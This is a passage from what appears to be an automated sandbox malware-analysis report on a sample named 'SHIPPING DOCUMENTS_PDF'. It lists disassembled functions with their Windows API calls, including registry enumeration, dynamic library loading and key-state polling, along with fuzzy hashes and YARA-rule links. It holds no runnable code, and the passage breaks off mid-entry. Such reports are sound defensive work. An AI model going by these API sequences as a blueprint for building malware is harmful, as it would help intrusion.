                                                                                    • Instruction Fuzzy Hash: 9821837460020AABDB209F29DC44AF9BBE4EF44720F204A69FCA1D72D0EBB4DD50CB50
                                                                                    Function 00BB6E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00BB6E89
                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00BB6EBB
                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00BB6ECC
                                                                                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00BB6F06
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateHandle$FilePipe
                                                                                    • String ID: nul
                                                                                    • API String ID: 4209266947-2873401336
                                                                                    • Opcode ID: 5fe2ecd8d4ce92411b8543b5851e921d9145028d129131959d7eef20dd4b8e8a
                                                                                    • Instruction ID: a9f29f380e78b85402e79fa229611ef02716904f37e950940b41bbd360de12b4
                                                                                    • Opcode Fuzzy Hash: 5fe2ecd8d4ce92411b8543b5851e921d9145028d129131959d7eef20dd4b8e8a
                                                                                    • Instruction Fuzzy Hash: DB2192755003069BDB209F69DC44AFAB7E8EF45720F200A59F9A1D72D0EBB4EC50CB50
                                                                                    Function 00BBAC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 00BBAC54
                                                                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00BBACA8
                                                                                    • __swprintf.LIBCMT ref: 00BBACC1
                                                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,00BDF910), ref: 00BBACFF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorMode$InformationVolume__swprintf
                                                                                    • String ID: %lu
                                                                                    • API String ID: 3164766367-685833217
                                                                                    • Opcode ID: 43030e6679b10d4f666011bd82bdd16007abcd8dc30e2f5dc5883b784d9f443f
                                                                                    • Instruction ID: e077656c7554d7e48ecaa0b1fbcf18932779a22748b1594c79dd29201348ccba
                                                                                    • Opcode Fuzzy Hash: 43030e6679b10d4f666011bd82bdd16007abcd8dc30e2f5dc5883b784d9f443f
                                                                                    • Instruction Fuzzy Hash: 22217170A00109EFCB10DF64CD85EEEBBF8EF49715B0040E9F909AB261DA71EA45CB21
                                                                                    Function 00BB1AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00BB1B19
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: BuffCharUpper
                                                                                    • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                    • API String ID: 3964851224-769500911
                                                                                    • Opcode ID: 531d7bc37e8de95fbaa465f9b86d91ae6251937c95ead9f8755d11641e7481f2
                                                                                    • Instruction ID: 62705b149c8d524d7f3e1972a5cb798f64ab68b785e72021af22a9cc65b57549
                                                                                    • Opcode Fuzzy Hash: 531d7bc37e8de95fbaa465f9b86d91ae6251937c95ead9f8755d11641e7481f2
                                                                                    • Instruction Fuzzy Hash: 7F113C709102099FCF10EF98D8629FEB7F4FF25704F5088E5D86567695EB32990ACB50
                                                                                    Function 00BCEB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00BCEC07
                                                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00BCEC37
                                                                                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00BCED6A
                                                                                    • CloseHandle.KERNEL32(?), ref: 00BCEDEB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                    • String ID:
                                                                                    • API String ID: 2364364464-0
                                                                                    • Opcode ID: fc4e78a609f2ccaa543551182b7d9b94a8860e388a4554518a12aa440f5f4516
                                                                                    • Instruction ID: 51b2b4f1a95f94c2c1215edcb9abc5d0269b6c3fb8ed0d567ab3b890472004a3
                                                                                    • Opcode Fuzzy Hash: fc4e78a609f2ccaa543551182b7d9b94a8860e388a4554518a12aa440f5f4516
                                                                                    • Instruction Fuzzy Hash: 29815F716047019FD720EF28C886F2AB7E5AF44750F1488ADF96ADB2D2DBB0ED448B51
                                                                                    Function 00B7541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                                    • String ID:
                                                                                    • API String ID: 1559183368-0
                                                                                    • Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                                                    • Instruction ID: 38f9f4307beecffcefa8249c5b8ec4e16dbd60b88c8a93fbd5e50c39494d654b
                                                                                    • Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                                                    • Instruction Fuzzy Hash: 6351A370A00B059BDB349F69D88066E77E6EF50321F24C7A9F83D962D4D7B1DE909B40
                                                                                    Function 00BD0037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
                                                                                      • Part of subcall function 00BD0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BCFDAD,?,?), ref: 00BD0E31
                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BD00FD
                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00BD013C
                                                                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00BD0183
                                                                                    • RegCloseKey.ADVAPI32(?,?), ref: 00BD01AF
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00BD01BC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                    • String ID:
                                                                                    • API String ID: 3440857362-0
                                                                                    • Opcode ID: 2abe1ee8ab5acb46809dc3c2539f754ec42271aa5490d7f81e0c7ee71dcba321
                                                                                    • Instruction ID: 266d85fa75bb4f09f2f382e473766fdd2c573288a45c68372f14d48820ef6cbe
                                                                                    • Opcode Fuzzy Hash: 2abe1ee8ab5acb46809dc3c2539f754ec42271aa5490d7f81e0c7ee71dcba321
                                                                                    • Instruction Fuzzy Hash: 42518F71218204AFC714EF64CC91F6AB7E9FF84304F4449AEF955972A1EB31E909CB52
                                                                                    Function 00BCD8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00B59837: __itow.LIBCMT ref: 00B59862
                                                                                      • Part of subcall function 00B59837: __swprintf.LIBCMT ref: 00B598AC
                                                                                    • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00BCD927
                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00BCD9AA
                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00BCD9C6
                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00BCDA07
                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00BCDA21
                                                                                      • Part of subcall function 00B55A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00BB7896,?,?,00000000), ref: 00B55A2C
                                                                                      • Part of subcall function 00B55A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00BB7896,?,?,00000000,?,?), ref: 00B55A50
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                    • String ID:
                                                                                    • API String ID: 327935632-0
                                                                                    • Opcode ID: 881e06a9dbd4c82d061a04e5d72f4b38c5e7186d0ee7448b35bb035fbabd19f9
                                                                                    • Instruction ID: b35dcd2790b90e576e24c887e1d70285aeecce45ba40f21efc01c42e733da825
                                                                                    • Opcode Fuzzy Hash: 881e06a9dbd4c82d061a04e5d72f4b38c5e7186d0ee7448b35bb035fbabd19f9
                                                                                    • Instruction Fuzzy Hash: 20510979A04209DFCB10EFA8C494EADB7F5EF09311B1480A9E956AB312DB31ED45CB51
                                                                                    Function 00BBE571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00BBE61F
                                                                                    • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00BBE648
                                                                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00BBE687
                                                                                      • Part of subcall function 00B59837: __itow.LIBCMT ref: 00B59862
                                                                                      • Part of subcall function 00B59837: __swprintf.LIBCMT ref: 00B598AC
                                                                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00BBE6AC
                                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00BBE6B4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                    • String ID:
                                                                                    • API String ID: 1389676194-0
                                                                                    • Opcode ID: 3fb6364bf3d3df12e96c051f69ac4b14863ed0acb21a3557f4bf1b6ca5c22df9
                                                                                    • Instruction ID: 0dbc1dddae5b4f5edfe6d729659bc166eed39fee89411fd3c29819a9e56fae4a
                                                                                    • Opcode Fuzzy Hash: 3fb6364bf3d3df12e96c051f69ac4b14863ed0acb21a3557f4bf1b6ca5c22df9
                                                                                    • Instruction Fuzzy Hash: CE510A35A00609DFCB01EF64C981AADBBF5EF09355B1480E9E819AB361DB31ED15DF50
                                                                                    Function 00BDA056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0238ca337e9c70d8ef8cdc54246b2d9dd9db627a003b39a151d3614606b20de5
                                                                                    • Instruction ID: 837725c2ec30b1cecbb31c3bc513095c6eea42b0c8d3c7bd931b189cb6fb3923
                                                                                    • Opcode Fuzzy Hash: 0238ca337e9c70d8ef8cdc54246b2d9dd9db627a003b39a151d3614606b20de5
                                                                                    • Instruction Fuzzy Hash: D0419035905104AFD724DF28CC99FA9FBE4EB0A310F1542A6E916B73E1EB30AD41DA51
                                                                                    Function 00B52344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCursorPos.USER32(?), ref: 00B52357
                                                                                    • ScreenToClient.USER32(00C157B0,?), ref: 00B52374
                                                                                    • GetAsyncKeyState.USER32(00000001), ref: 00B52399
                                                                                    • GetAsyncKeyState.USER32(00000002), ref: 00B523A7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: AsyncState$ClientCursorScreen
                                                                                    • String ID:
                                                                                    • API String ID: 4210589936-0
                                                                                    • Opcode ID: 7492d296b4f9080bc1803cebcf8420b07befc5669a73d3d94c0bdb1f645896f5
                                                                                    • Instruction ID: 34de76a36a9653a3d1949844d0818f7a3f38d73ac9e56505eaf24f78a4df0ab7
                                                                                    • Opcode Fuzzy Hash: 7492d296b4f9080bc1803cebcf8420b07befc5669a73d3d94c0bdb1f645896f5
                                                                                    • Instruction Fuzzy Hash: 68419075608105FFCF159F68C884BE9FBB4FB05360F20439AF829A22A0CB309954DFA0
                                                                                    Function 00BA63AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BA63E7
                                                                                    • TranslateAcceleratorW.USER32(?,?,?), ref: 00BA6433
                                                                                    • TranslateMessage.USER32(?), ref: 00BA645C
                                                                                    • DispatchMessageW.USER32(?), ref: 00BA6466
                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BA6475
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                                    • String ID:
                                                                                    • API String ID: 2108273632-0
                                                                                    • Opcode ID: e98b99383d11a2473011f624ddae0c05b3b8154dc8ff9dcf3b9a8541c89e93d4
                                                                                    • Instruction ID: b3d3e32ba7d05e0493b568a9955c54ddb4ec59e9f23509ddaa17dbf6249b4fd2
                                                                                    • Opcode Fuzzy Hash: e98b99383d11a2473011f624ddae0c05b3b8154dc8ff9dcf3b9a8541c89e93d4
                                                                                    • Instruction Fuzzy Hash: 603194B1909646DFDB248F749C84BFABBE8EB07300F1841A5E425C72A1EB359859D750
                                                                                    Function 00BA8A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetWindowRect.USER32(?,?), ref: 00BA8A30
                                                                                    • PostMessageW.USER32(?,00000201,00000001), ref: 00BA8ADA
                                                                                    • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00BA8AE2
                                                                                    • PostMessageW.USER32(?,00000202,00000000), ref: 00BA8AF0
                                                                                    • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00BA8AF8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePostSleep$RectWindow
                                                                                    • String ID:
                                                                                    • API String ID: 3382505437-0
                                                                                    • Opcode ID: c4c15caa46fb10a0c87f0c9b9384f4fc55a417c8c1e73d9c0514b13c7bb7f596
                                                                                    • Instruction ID: 99f2ac96d5d9ad2996b14af6d9e6d281a1c5b1138d1f6b41153782fc9b3efe1f
                                                                                    • Opcode Fuzzy Hash: c4c15caa46fb10a0c87f0c9b9384f4fc55a417c8c1e73d9c0514b13c7bb7f596
                                                                                    • Instruction Fuzzy Hash: 8A31E071504219EBDF14CFA8D94CAAE7BB5EB05315F10826AF925E75D0DBB09910CB90
                                                                                    Function 00BAB1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • IsWindowVisible.USER32(?), ref: 00BAB204
                                                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00BAB221
                                                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00BAB259
                                                                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00BAB27F
                                                                                    • _wcsstr.LIBCMT ref: 00BAB289
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                    • String ID:
                                                                                    • API String ID: 3902887630-0
                                                                                    • Opcode ID: a08da2bb5b83a75424ee1154c458665d3fb5316e097564f831f2d13a93acb841
                                                                                    • Instruction ID: 5ab9bb711509fe66688db91bd34c57863d562ac779ede417a65db95340fc3519
                                                                                    • Opcode Fuzzy Hash: a08da2bb5b83a75424ee1154c458665d3fb5316e097564f831f2d13a93acb841
                                                                                    • Instruction Fuzzy Hash: 5321D332609201BAEB255B759C49E7FBFD8DB4A710F0081BBF819DA1A2EF61DC409660
                                                                                    Function 00BDB14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00B52612: GetWindowLongW.USER32(?,000000EB), ref: 00B52623
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00BDB192
                                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00BDB1B7
                                                                                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00BDB1CF
                                                                                    • GetSystemMetrics.USER32(00000004), ref: 00BDB1F8
                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00BC0E90,00000000), ref: 00BDB216
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Long$MetricsSystem
                                                                                    • String ID:
                                                                                    • API String ID: 2294984445-0
                                                                                    • Opcode ID: ce907034c8355dfa288e5718932d800fe21684382df13fdfed1a5d8f6f12fdd3
                                                                                    • Instruction ID: de97e543382c44f8ff237782b3f357a31f9c46cd3093634d832838ca2d77f79d
                                                                                    • Opcode Fuzzy Hash: ce907034c8355dfa288e5718932d800fe21684382df13fdfed1a5d8f6f12fdd3
                                                                                    • Instruction Fuzzy Hash: 96217171924251EFCB109F389C54F6ABBE4FB06361B16477AA926D72E0F73098108B90
                                                                                    Function 00BA9307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00BA9320
